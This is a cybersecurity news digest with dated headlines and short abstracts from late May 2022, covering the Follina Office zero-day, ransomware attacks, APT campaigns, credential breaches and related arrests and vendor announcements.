May 2022
May 31, 2022 – APT
Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability
Abstract
An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems. "TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet. "Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app." TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox. The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code. Specific... (Source: The Hacker News)
May 31, 2022 – Hacker
Hackers steal WhatsApp accounts using call forwarding trick
Abstract
There's a trick that allows attackers to hijack a victim's WhatsApp account and gain access to personal messages and contact list. (Source: BleepingComputer)
May 31, 2022 – General
Malware Volumes Decline as Trojan Distribution Surges
Abstract
Trojan families that affected users the most included Mobtes (44.35%), Piom (32.61%), and Boogr (14.32%). Iran at 35.25% stands as the most impacted country by mobile malware. (Source: Cyware Alerts - Hacker News)
May 31, 2022 – General
Latest Mobile Malware Report Suggests On-Device Fraud is on the Rise
Abstract
An analysis of the mobile threat landscape in 2022 shows that Spain and Turkey are the most targeted countries for malware campaigns, even as a mix of new and existing banking trojans are increasingly targeting Android devices to conduct on-device fraud (ODF). Other frequently targeted countries include Poland, Australia, the U.S., Germany, the U.K., Italy, France, and Portugal. "The most worrying leitmotif is the increasing attention to On-Device Fraud (ODF)," Dutch cybersecurity company ThreatFabric said in a report shared with The Hacker News. "Just in the first five months of 2022 there has been an increase of more than 40% in malware families that abuse Android OS to perform fraud using the device itself, making it almost impossible to detect them using traditional fraud scoring engines." Hydra, FluBot (aka Cabassous), Cerberus, Octo, and ERMAC accounted for the most active banking trojans based on the number of samples observed during the same... (Source: The Hacker News)
May 31, 2022 – APT
SideWinder carried out over 1,000 attacks since April 2020
Abstract
SideWinder, an aggressive APT group, is believed to have carried out over 1,000 attacks since April 2020, Kaspersky reported. Researchers from Kaspersky have analyzed the activity of an aggressive threat actor tracked as SideWinder (aka RattleSnake... (Source: Security Affairs)
May 31, 2022 – APT
Windows MSDT zero-day now exploited by Chinese APT hackers
Abstract
Chinese-linked threat actors are now actively exploiting a Microsoft Office zero-day vulnerability (known as 'Follina') to execute malicious code remotely on Windows systems. (Source: BleepingComputer)
May 31, 2022 – General
Key Trends in The Verizon Data Breach Investigation Report 2022
Abstract
According to the report, ransomware attacks continue to mount pressure on organizations worldwide as researchers recorded a 13% increase in such attacks. While 40% of ransomware incidents were executed via desktop sharing software, 35% involved the use of email. (Source: Cyware Alerts - Hacker News)
May 31, 2022 – Attack
SideWinder Hackers Launched Over 1,000 Cyber Attacks Over the Past 2 Years
Abstract
An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020. "Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations," cybersecurity firm Kaspersky said in a report that was presented at Black Hat Asia this month. SideWinder, also called Rattlesnake or T-APT-04, is said to have been active since at least 2012 with a track record of targeting military, defense, aviation, IT companies, and legal firms in Central Asian countries such as Afghanistan, Bangladesh, Nepal, and Pakistan. Kaspersky's APT trends report for Q1 2022 published late last month revealed that the threat actor is actively expanding the geography of its targets beyond its traditional victim profile to other... (Source: The Hacker News)
May 31, 2022 – Vulnerabilities
Microsoft shared workarounds for the Microsoft Office zero-day dubbed Follina
Abstract
Microsoft released workarounds for a recently discovered zero-day vulnerability, dubbed Follina, in the Microsoft Office productivity suite. Microsoft has released workarounds for a recently discovered zero-day vulnerability, dubbed... (Source: Security Affairs)
May 31, 2022 – Vulnerabilities
Over 3.6 million MySQL servers found exposed on the Internet
Abstract
Over 3.6 million MySQL servers are publicly exposed on the Internet and responding to queries, making them an attractive target to hackers and extortionists. (Source: BleepingComputer)
May 31, 2022 – Breach
Australia’s National Disability Insurance Scheme Hit by Breach at Case Management System Provider
Abstract
CTARS, a Sydney-based software and analytics provider for the disability and care sectors, this week revealed an unauthorized third-party had gained access to its systems on May 15. (Source: IT News)
May 31, 2022 – Education
Learn Raspberry Pi and Arduino with 9 Online Developer Training Courses
Abstract
This is an exciting time for the Internet of Things. According to Deloitte research, the average U.S. household now has 25 connected devices — and new products are being launched every day. This rush of demand means that many tech companies are looking for developers with IoT knowledge. And even if you don't want to specialize in this field, the programming skills are transferable. Featuring nine full-length video courses, The 2022 Complete Raspberry Pi & Arduino Developer Bundle provides a really good introduction to this world. The included training is worth a total of $1,800, but readers of The Hacker News can currently pick up the bundle for only $39.99. Special Offer — For a limited time, you can get lifetime access to nine courses on Arduino and Raspberry Pi development for just $39.99. That's a massive 97% off the total price. Both the Raspberry Pi and the Arduino were specifically designed to help people learn how to code. But both devices have also been us... (Source: The Hacker News)
May 31, 2022 – Attack
Experts warn of ransomware attacks against government organizations of small states
Abstract
Cyber Research Labs reported a rise in ransomware attacks in the second quarter of 2022, and small states are more exposed to these attacks. Cyber Research Labs observed a rise in ransomware attacks in the second quarter of 2022, some of them with a severe... (Source: Security Affairs)
May 31, 2022 – Government
FBI warns of Ukrainian charities impersonated to steal donations
Abstract
Scammers are claiming to be collecting donations to help Ukrainian refugees and war victims while impersonating legitimate Ukrainian humanitarian aid organizations, according to the Federal Bureau of Investigation (FBI). (Source: BleepingComputer)
May 31, 2022 – Solution
Microsoft is rolling out these security settings to protect millions of accounts
Abstract
Microsoft began rolling out security defaults to customers who created a new Azure AD tenant after October 2019, but didn't enable the defaults for customers that created Azure AD tenants prior to October 2019. (Source: ZDNet)
May 31, 2022 – Attack
Costa Rica’s public health agency hit by Hive ransomware
Abstract
All computer systems on the network of Costa Rica's public health service (known as the Costa Rican Social Security Fund, or CCSS) are now offline following a Hive ransomware attack that hit them this morning. (Source: BleepingComputer)
May 31, 2022 – Business
Hoxhunt Raises $40M in Series B Funding
Abstract
Hoxhunt, a Helsinki, Finland–based cybersecurity training platform provider, raised $40 million in Series B funding. The round was led by Level Equity Management, with participation from existing investor Icebreaker.vc. (Source: FinSMEs)
May 31, 2022 – Botnet
New XLoader botnet uses probability theory to hide its servers
Abstract
Threat analysts have spotted a new version of the XLoader botnet malware that uses probability theory to hide its command and control servers, making it difficult to disrupt the malware's operation. (Source: BleepingComputer)
May 31, 2022 – Attack
Experts warn of ransomware attacks against government organizations of small states
Abstract
The experts at Cyber Research Labs warn of ransomware attacks against government organizations. They observed a total of 48 government organizations from 21 countries that were hit by 13 ransomware attacks in 2022. (Source: Security Affairs)
May 31, 2022 – Education
Aligning Your Password Policy Enforcement with NIST Guidelines
Abstract
Although most organizations are not required by law to comply with NIST standards, it is usually in an organization's best interest to follow NIST's cybersecurity standards. This is especially true for NIST's password guidelines. (Source: BleepingComputer)
May 31, 2022 – Encryption
Singapore ups investment in quantum computing to stay ahead of security threats
Abstract
The Singapore government on Tuesday announced plans to set aside SG$23.5 million (US$17.09 million) to support three national platforms, parked under its Quantum Engineering Programme (QEP), for up to 3.5 years. (Source: ZDNet)
May 31, 2022 – Solution
Microsoft shares mitigation for Office zero-day exploited in attacks
Abstract
Microsoft has shared mitigation measures to block attacks exploiting a newly discovered Microsoft Office zero-day flaw abused in the wild to execute malicious code remotely. (Source: BleepingComputer)
May 30, 2022 – Criminals
Interpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks
Abstract
Interpol on Monday announced the arrest of three suspected global scammers in Nigeria for using remote access trojans (RATs) such as Agent Tesla to facilitate malware-enabled cyber fraud. "The men are thought to have used the RAT to reroute financial transactions, stealing confidential online connection details from corporate organizations, including oil and gas companies in South East Asia, the Middle East and North Africa," the International Criminal Police Organization said in a statement. One of the scammers in question, named Hendrix Omorume, has been charged and convicted of three counts of financial fraud and has been sentenced to a 12-month prison term. The two other suspects are still on trial. The three Nigerian individuals, who are aged between 31 and 38, have been apprehended for being in possession of fake documents such as fraudulent invoices and forged official letters. The law enforcement agency said that the suspects systematically used Agent Tesla to breach... (Source: The Hacker News)
May 30, 2022 – Vulnerabilities
Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation
Abstract
Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems. The weakness, now assigned the identifier CVE-2022-30190, is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted. "To help protect customers, we've published CVE-2022-30190 and additional guidance here," a Microsoft spokesperson told The Hacker News in an emailed statement. The Follina vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the "ms-msdt:" URI scheme. The sample was uploaded to VirusTotal from Belarus. But first signs of exploitation of the flaw date back... (Source: The Hacker News)
May 30, 2022 – Privacy
Vodafone plans carrier-level user tracking for targeted ads
Abstract
Vodafone is piloting a new advertising ID system called TrustPid, which will work as a persistent user tracker at the mobile Internet Service Provider (ISP) level. (Source: BleepingComputer)
May 30, 2022 – Covid-19
Double-whammy attack follows fake Covid alert with a bogus bank call
Abstract
The BBC has revealed details of how a food bank in the United Kingdom was conned out of about $63,000 (£50,000) by scammers who used two separate attacks to fleece their victims. (Source: Malwarebytes Labs)
May 30, 2022 – General
Is 3rd Party App Access the New Executable File?
Abstract
It's no secret that 3rd party apps can boost productivity, enable remote and hybrid work and are, overall, essential in building and scaling a company's work processes. Much like clicking on an attachment in the earlier days of email, connecting a needed app to a Google Workspace or M365 environment has become an innocuous process that people don't think twice about. Simple actions that users take, from creating an email to updating a contact in the CRM, can result in several other automatic actions and notifications in the connected platforms. As seen in the image below, the OAuth mechanism makes it incredibly easy to interconnect apps, and many don't consider what the possible ramifications could be. When these apps and other add-ons for SaaS platforms ask for permissions, they are usually granted without a second thought, presenting more opportunities for bad actors to gain access to a company's data. This puts companies at risk for supply chain... (Source: The Hacker News)
May 30, 2022 – Criminals
Three Nigerian men arrested in INTERPOL Operation Killer Bee
Abstract
Interpol arrested three Nigerian men in Lagos, who are suspected of using the Agent Tesla RAT to reroute financial transactions and steal sensitive data. Interpol arrested 3 Nigerian men in Lagos, as part of an international operation codenamed Killer... (Source: Security Affairs)
May 30, 2022 – Denial Of Service
Italy warns organizations to brace for incoming DDoS attacks
Abstract
The Computer Security Incident Response Team in Italy issued an urgent alert yesterday to raise awareness about the high risk of cyberattacks against national bodies and organizations on Monday. (Source: BleepingComputer)
May 30, 2022 – Attack
North Orange County Community College District was hit by ransomware in January
Abstract
Cypress College and Fullerton College experienced a ransomware attack. They immediately took steps to confirm the security of their systems, including the deployment of an advanced threat protection and monitoring tool. (Source: Data Breaches)
May 30, 2022 – Botnet
EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities
Abstract
A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices." First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ. Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals... (Source: The Hacker News)
May 30, 2022 – Phishing
A new WhatsApp OTP scam could allow the hijacking of users’ accounts
Abstract
Experts warn of a new ongoing WhatsApp OTP scam that could allow attackers to hijack users’ accounts through phone calls. Recently CloudSEK founder Rahul Sasi warned of an ongoing WhatsApp OTP scam that could allow threat actors to hijack users’... (Source: Security Affairs)
May 30, 2022 – Policy and Law
Three Nigerians arrested for malware-assisted financial crimes
Abstract
Interpol has announced the arrest of three Nigerian men in Lagos, who are suspected of using remote access trojans (RATs) to reroute financial transactions and steal account credentials. (Source: BleepingComputer)
May 30, 2022 – Malware
Linux malware is on the rise—6 types of attacks to look for
Abstract
Security is the weakest when sysadmins and developers race against time and deadlines. Opportunistic attackers take advantage of the "economy of attention" as developers can often overlook security risks. (Source: CSO Online)
May 30, 2022 – Malware
Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild
Abstract
Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems. The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document ("05-2022-0438.doc") that was uploaded to VirusTotal from an IP address in Belarus. "It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code," the researchers noted in a series of tweets last week. According to security researcher Kevin Beaumont, who dubbed the flaw "Follina," the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload. The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in t... (Source: The Hacker News)
May 30, 2022 – Vulnerabilities
Multiple Microsoft Office versions impacted by an actively exploited zero-day
Abstract
A zero-day flaw in Microsoft Office could be exploited by attackers to achieve arbitrary code execution on Windows systems. The cybersecurity researcher nao_sec discovered a malicious Word document ("05-2022-0438.doc") that was uploaded to VirusTotal... (Source: Security Affairs)
May 30, 2022 – Attack
New Microsoft Office zero-day used in attacks to execute PowerShell
Abstract
Security researchers have discovered a new Microsoft Office zero-day vulnerability that is being used in attacks to execute malicious PowerShell commands via Microsoft Diagnostic Tool (MSDT) simply by opening a Word document. (Source: BleepingComputer)
May 30, 2022 – Government
Credentials of Higher Education Institutions Available For Sale: FBI Warns
Abstract
The FBI alerted that credentials stolen from the higher education sector are being sold on multiple public and dark web marketplaces. In some cases, VPN and network access credentials are being sold for thousands of dollars. The FBI recommends colleges and universities pay special attention to conn... (Source: Cyware Alerts - Hacker News)
May 30, 2022 – Attack
GoodWill Ransomware victims have to perform socially driven activities to decrypt their data
Abstract
Researchers discovered a new ransomware family called GoodWill that asks victims to donate the ransom for social causes. CloudSEK’s Threat Intelligence Research team has disclosed a new ransomware strain called GoodWill, that demands... (Source: Security Affairs)
May 30, 2022 – General
$39.5 billion lost to phone scams in last year
Abstract
A recent study estimates that a staggering $39.5 billion was lost to phone scams this past year, which is the highest number recorded since Truecaller began researching scam and spam calls in the U.S. eight years ago. (Source: Help Net Security)
May 30, 2022 – Malware
EnemyBot malware adds new exploits to target CMS servers and Android devices
Abstract
The operators of the EnemyBot botnet added exploits for recently disclosed flaws in VMware, F5 BIG-IP, and Android systems. Operators behind the EnemyBot botnet are expanding the list of potential targets adding exploits for recently disclosed critical... (Source: Security Affairs)
May 30, 2022 – Breach
Spirit Super Member Data Exposed After Security Breach
Abstract
The personal data that may have been compromised is akin to the information found in an annual statement. It includes items like name, addresses, ages, email addresses, telephone numbers, member account numbers and member balances. (Source: Financial Standard)
May 30, 2022 – General
IT threat evolution in Q1 2022. Mobile statistics
Abstract
One of the schemes used by scammers which has been becoming more popular since last year is scam apps for receiving social benefits. These apps redirect to a webpage asking for personal data to claim a large sum of money. (Source: Securelist)
May 30, 2022 – Business
Hornetsecurity acquires IT-Seal to add security training services to its portfolio
Abstract
Located in Darmstadt, Germany, IT-Seal specializes in establishing a sustainable security culture. It employs innovative technologies to train employees at businesses and organizations worldwide. (Source: Help Net Security)
May 30, 2022 – Attack
Document Exploiting New Microsoft Office Zero-Day Seen in the Wild
Abstract
On May 27, a researcher who uses the online moniker “nao_sec” reported on Twitter that they had found an interesting malicious document on the VirusTotal malware scanning service. (Source: Security Week)
May 29, 2022 – Attack
New ‘GoodWill’ Ransomware Forces Victims to Donate Money and Clothes to the Poor
Abstract
Cybersecurity researchers have disclosed a new ransomware strain called GoodWill that compels victims into donating for social causes and providing financial assistance to people in need. "The ransomware group propagates very unusual demands in exchange for the decryption key," researchers from CloudSEK said in a report published last week. "The Robin Hood-like group claims to be interested in helping the less fortunate, rather than extorting victims for financial motivations." Written in .NET, the ransomware was first identified by the India-based cybersecurity firm in March 2022, with the infections rendering sensitive files inaccessible without decrypting them. The malware, which makes use of the AES algorithm for encryption, is also notable for sleeping for 722.45 seconds to interfere with dynamic analysis. The encryption process is followed by displaying a multiple-paged ransom note that requires the victims to carry out three socially-driven activitie... (Source: The Hacker News)
May 29, 2022 – Breach
FBI Warns About Hackers Selling VPN Credentials for U.S. College Networks
Abstract
Network credentials and virtual private network (VPN) access for colleges and universities based in the U.S. are being advertised for sale on underground and public criminal marketplaces. "This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber attacks against individual users or affiliated organizations," the U.S. Federal Bureau of Investigation (FBI) said in an advisory published last week. The cyber intrusions against educational institutions involve threat actors leveraging tactics like spear-phishing and ransomware to carry out credential harvesting activities. The gathered credentials are then exfiltrated and sold on Russian cybercrime forums for prices ranging from a few to thousands of U.S. dollars. Armed with this login information, the agency pointed out, adversaries can proceed to conduct brute-force credential stuffing attacks to break into victim accounts spanning different... (Source: The Hacker News)
May 29, 2022 – Malware
EnemyBot malware adds exploits for critical VMware, F5 BIG-IP flaws
Abstract
EnemyBot, a botnet based on code from multiple malware pieces, is expanding its reach by quickly adding exploits for recently disclosed critical vulnerabilities in web servers, content management systems, IoT, and Android devices. (Source: BleepingComputer)
May 29, 2022 – Hacker
Pro-Russian hacker group KillNet plans to attack Italy on May 30
Abstract
Pro-Russian hacker group KillNet is threatening Italy again: it announced a massive and unprecedented attack on May 30. Pro-Russian... (Source: Security Affairs)
May 29, 2022 – General
Mobile trojan detections rise as malware distribution level declines
Abstract
Kaspersky's quarterly report on mobile malware distribution records a downward trend that started at the end of 2020, detecting one-third of the malicious installations reported in Q1 2021, and about 85% of those counted in Q4 2021. (Source: BleepingComputer)
May 29, 2022 – General
Security Affairs newsletter Round 367 by Pierluigi Paganini
Abstract
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. If you also want to receive the free newsletter covering the international press, subscribe here. Experts... (Source: Security Affairs)
May 29, 2022 – Criminals
New Yorker imprisoned for role in carding group behind $568M damages
Abstract
John Telusma, a 37-year-old man from New York, was sentenced to four years in prison for selling and using stolen and compromised credit cards on the Infraud carding portal operated by the transnational cybercrime organization with the same name. (Source: BleepingComputer)
May 29, 2022 – Policy and Law
US man sentenced to 4 years in prison for his role in Infraud scheme
Abstract
A man from New York was sentenced to four years in prison for trading stolen credit card data and assisting the Infraud Organization. John Telusma (aka 'Peterelliot'), 37, from New York, was sentenced this week to four years in prison... (Source: Security Affairs)
May 28, 2022 – Ransomware
Cheerscrypt Ransomware Targets VMware ESXi Servers
Abstract
The widescale use of VMware ESXi in enterprises has now attracted a new Cheerscrypt ransomware threat that is targeting poorly secured ESXi servers. According to the ransom notes, the attackers give their victims three days to access the provided Tor site to negotiate the ransom payment for a worki... (Source: Cyware Alerts - Hacker News)
May 28, 2022 – Policy and Law
New York Man Sentenced to 4 Years in Transnational Cybercrime Scheme
Abstract
A 37-year-old man from New York has been sentenced to four years in prison for buying stolen credit card information and working in cahoots with a cybercrime cartel known as the Infraud Organization. John Telusma, who went by the alias "Peterelliot," pleaded guilty to one count of racketeering conspiracy on October 13, 2021. He joined the gang in August 2011 and remained a member for five-and-a-half years. "Telusma was among the most prolific and active members of the Infraud Organization, purchasing and fraudulently using compromised credit card numbers for his own personal gain," the U.S. Justice Department (DoJ) said. Infraud, a transnational cybercrime behemoth, operated for more than seven years, advertising its activities under the slogan "In Fraud We Trust," before its online infrastructure was dismantled by U.S. law enforcement authorities in February 2018. The rogue enterprise dabbled in the large-scale acquisition and sale of compromised... (Source: The Hacker News)
May 28, 2022 – Criminals
Industrial Spy: Data Extortion Marketplace Ventures into Ransomware
Abstract
MalwareHunterTeam discovered a new malware sample containing a ransom note instead of a promotional text. The note states that the gang has stolen the victim’s data, along with encrypting it. (Source: Cyware Alerts - Hacker News)
May 28, 2022 – Vulnerabilities
Microsoft Finds Critical Bugs in Pre-Installed Apps on Millions of Android Devices
Abstract
Four high severity vulnerabilities have been disclosed in a framework used by pre-installed Android System apps with millions of downloads. The issues, now fixed by its Israeli developer MCE Systems, could have potentially allowed threat actors to stage remote and local attacks or be abused as vectors to obtain sensitive information by taking advantage of their extensive system privileges. "As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device," the Microsoft 365 Defender Research Team said in a report published Friday. The weaknesses, which range from command-injection to local privilege escalation, have been assigned the identifiers CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601, with CVSS scores between 7.0 and 8.9. [Figure: Command injection proof-of-concept (POC) exploit code] Injecting a simil... (Source: The Hacker News)
May 28, 2022 – Criminals
Clop ransomware gang is back, hits 21 victims in a single month
Abstract
After effectively shutting down their entire operation for several months, between November and February, the Clop ransomware is now back according to NCC Group researchers. (Source: BleepingComputer)
May 28, 2022 – APT
Experts believe that Russian Gamaredon APT could fuel a new round of DDoS attacks
Abstract
360 Qihoo reported DDoS attacks launched by APT-C-53 (aka Gamaredon) conducted through the open-source DDoS Trojan program LOIC. Researchers at 360 Qihoo observed a wave of DDoS attacks launched by Russia-linked APT-C-53 (aka Gamaredon) and reported... (Source: Security Affairs)
May 28, 2022 – Malware
New Windows Subsystem for Linux malware steals browser auth cookies
Abstract
Hackers are showing an increased interest in the Windows Subsystem for Linux (WSL) as an attack surface as they build new malware, the more advanced samples being suitable for espionage and downloading additional malicious modules. (Source: BleepingComputer)
May 28, 2022 – Criminals
The strange link between Industrial Spy and the Cuba ransomware operation
Abstract
The recently launched Industrial Spy data extortion marketplace has now started its ransomware operation. In April, MalwareHunterTeam and BleepingComputer reported the launch of a new dark web marketplace called Industrial Spy that sells stolen... (Source: Security Affairs)
May 28, 2022 – APT
Reuters: Russia-linked APT behind Brexit leak website
Abstract
Russia-linked threat actors are behind a new website that published leaked emails from leading proponents of Britain's exit from the EU, Reuters reported. According to a Google cybersecurity official and the former head of UK foreign intelligence,... (Source: Security Affairs)
May 28, 2022 – Breach
GitHub: Nearly 100,000 NPM Users’ credentials stolen in the April OAuth token attack
Abstract
GitHub provided additional details on the theft of its integration OAuth tokens that occurred in April, in which nearly 100,000 NPM users' credentials were stolen. GitHub provided additional details about the incident it suffered in April; the attackers were... (Source: Security Affairs)
May 28, 2022 – Vulnerabilities
GitHub saved plaintext passwords of npm users in log files
Abstract
GitHub has revealed it stored a "number of plaintext user credentials for the npm registry" in internal logs following the integration of the JavaScript package registry into GitHub's logging systems. (Source: The Register)
May 28, 2022 – Government
CISA adds 75 actively exploited bugs to its must-patch list in just a week Full Text
Abstract
The US cybersecurity authority is urging everyone to patch a number of software flaws, including some older ones in Microsoft's Silverlight plug-in and Adobe Flash Player.ZDNet
May 27, 2022 – Government
FBI warns of hackers selling credentials for U.S. college networks Full Text
Abstract
Cybercriminals are offering to sell network access credentials for higher education institutions based in the United States for thousands of U.S. dollars.BleepingComputer
May 27, 2022 – Vulnerabilities
Experts Detail New RCE Vulnerability Affecting Google Chrome Dev Channel Full Text
Abstract
Details have emerged about a recently patched critical remote code execution vulnerability in the V8 JavaScript and WebAssembly engine used in Google Chrome and Chromium-based browsers. The issue relates to a case of use-after-free in the instruction optimization component, successful exploitation of which could "allow an attacker to execute arbitrary code in the context of the browser." The flaw, which was identified in the Dev channel version of Chrome 101, was reported to Google by Weibo Wang, a security researcher at Singapore cybersecurity company Numen Cyber Technology, and has since been quietly fixed by the company. "This vulnerability occurs in the instruction selection stage, where the wrong instruction has been selected, resulting in a memory access exception," Wang said. Use-after-free flaws occur when previously freed memory is accessed, inducing undefined behavior and causing a program to crash, use corrupted data, or even achieve executionThe Hacker News
May 27, 2022 – General
How to Start a Cybersecurity Clinic Full Text
Abstract
University-based cybersecurity clinics are a way for universities to meet their ideals and responsibilities for public service by addressing two intersecting challenges at once: the growing need for experienced cybersecurity talent and developing resilience in important, at-risk sectors.Lawfare
May 27, 2022 – General
The Effects of Digital Transnational Repression and the Responsibility of Host States Full Text
Abstract
Digital transnational repression has a chilling effect on exiled and diaspora activists and dissidents who find themselves repressed by authoritarian states, even in places where they assumed they had a relative degree of safety and freedom.Lawfare
May 27, 2022 – General
Android pre-installed apps are affected by high-severity vulnerabilities Full Text
Abstract
Microsoft found several high-severity vulnerabilities in a mobile framework used in pre-installed Android System apps. The Microsoft 365 Defender Research Team discovered four vulnerabilities (CVE-2021-42598, CVE-2021-42599, CVE-2021-42600,...Security Affairs
May 27, 2022 – Breach
GitHub: Attackers stole login details of 100K npm user accounts Full Text
Abstract
GitHub revealed today that an attacker stole the login details of roughly 100,000 npm accounts during a mid-April security breach with the help of stolen OAuth app tokens issued to Heroku and Travis-CI.BleepingComputer
May 27, 2022 – Breach
Nearly 100,000 NPM Users’ Credentials Stolen in GitHub OAuth Breach Full Text
Abstract
Cloud-based repository hosting service GitHub on Friday shared additional details into the theft of GitHub integration OAuth tokens last month, noting that the attacker was able to access internal NPM data and its customer information. "Using stolen OAuth user tokens originating from two third-party integrators, Heroku and Travis CI, the attacker was able to escalate access to NPM infrastructure," Greg Ose said, adding the attacker then managed to obtain a number of files:
- A database backup of skimdb.npmjs.com consisting of data as of April 7, 2021, including an archive of user information from 2015 and all private NPM package manifests and package metadata. The archive contained NPM usernames, password hashes, and email addresses for roughly 100,000 users
- A set of CSV files encompassing an archive of all names and version numbers of published versions of all NPM private packages as of April 10, 2022, and
- A "small subset" of private packages from two orgaThe Hacker News
May 27, 2022 – General
GhostTouch: how to remotely control touchscreens with EMI Full Text
Abstract
Security researchers devised a technique, dubbed GhostTouch, to remotely control touchscreens using electromagnetic signals. A team of researchers from Zhejiang University and Technical University of Darmstadt devised a technique, dubbed GhostTouch,...Security Affairs
May 27, 2022 – Vulnerabilities
Microsoft finds severe bugs in Android apps from large mobile providers Full Text
Abstract
Microsoft security researchers have found high-severity vulnerabilities in a framework used by Android apps from multiple large international mobile service providers.BleepingComputer
May 27, 2022 – Vulnerabilities
Patch released for cross-domain cookie leakage flaw in Guzzle Full Text
Abstract
The flaw resides in Guzzle’s cookie middleware, which is disabled by default, “so most library consumers will not be affected by this issue”, reads a GitHub security advisory published by a Guzzle maintainer on Wednesday (May 25).The Daily Swig
May 27, 2022 – Education
The Myths of Ransomware Attacks and How To Mitigate Risk Full Text
Abstract
Today's modern companies are built on data, which now resides across countless cloud apps. Therefore, preventing data loss is essential to your success. This is especially critical for mitigating against rising ransomware attacks — a threat that 57% of security leaders expect to be compromised by within the next year. As organizations continue to evolve, in turn so does ransomware. To help you stay ahead, Lookout Chief Strategy Officer Aaron Cockerill met with Microsoft Chief Security Advisor Sarah Armstrong-Smith to discuss how remote work and the cloud have made it more difficult to spot a ransomware attack, as well as how deploying behavioral-anomaly-based detection can help mitigate ransomware risk. Access the full interview. Aaron Cockerill: I feel like the way modern enterprises operate, which includes a combination of technologies, has allowed the ransomware to thrive. Having experienced this type of attack in my past roles, I know how many CISOs are feelingThe Hacker News
May 27, 2022 – Government
FBI: Compromised US academic credentials available on various cybercrime forums Full Text
Abstract
The FBI warns organizations in the higher education sector of credentials sold on cybercrime forums that can allow threat actors to access their networks. The FBI issued an alert to inform the higher education sector about the availability of login...Security Affairs
May 27, 2022 – Business
Microsoft to force better security defaults for all Azure AD tenants Full Text
Abstract
Microsoft has announced that it will force-enable stricter secure default settings known as 'security defaults' on all existing Azure Active Directory (Azure AD) tenants starting in late June 2022.BleepingComputer
May 27, 2022 – Outage
Cyber attack downs Regina Public Schools’ computer systems Full Text
Abstract
In a statement published to social media networks on Thursday afternoon, officials said that after "several days of investigation" it has become clear that the incident that first began on Sunday is a cyberattack.CBC
May 27, 2022 – Vulnerabilities
Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely Full Text
Abstract
Researchers have demonstrated what they call the "first active contactless attack against capacitive touchscreens." GhostTouch, as it's called, "uses electromagnetic interference (EMI) to inject fake touch points into a touchscreen without the need to physically touch it," a group of academics from Zhejiang University and Technical University of Darmstadt said in a new research paper. The core idea is to take advantage of the electromagnetic signals to execute basic touch events such as taps and swipes into targeted locations of the touchscreen with the goal of taking over remote control and manipulating the underlying device. The attack, which works from a distance of up to 40 mm, hinges on the fact that capacitive touchscreens are sensitive to EMI, leveraging it to inject electromagnetic signals into transparent electrodes that are built into the touchscreen so as to register them as touch events. The experimental setup involves an electrostatic gunThe Hacker News
May 27, 2022 – Malware
ERMAC 2.0 Android Banking Trojan targets over 400 apps Full Text
Abstract
A new version of the ERMAC Android banking trojan is able to target an increased number of apps. The ERMAC Android banking trojan version 2.0 can target an increasing number of applications, rising from 378 to 467 target applications to steal account...Security Affairs
May 27, 2022 – Ransomware
BlackCat/ALPHV ransomware asks $5 million to unlock Austrian state Full Text
Abstract
Austrian federal state Carinthia has been hit by the BlackCat ransomware gang, also known as ALPHV, which demanded $5 million to unlock the encrypted computer systems.BleepingComputer
May 27, 2022 – Criminals
Exposed: the threat actors who are poisoning Facebook Full Text
Abstract
An investigation of the infamous “Is That You?” video scam has led Cybernews researchers to a cybercriminal stronghold, from which threat actors have been infecting the social media giant with thousands of malicious links every day.Security Affairs
May 27, 2022 – Vulnerabilities
Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller, and Firewall Devices Full Text
Abstract
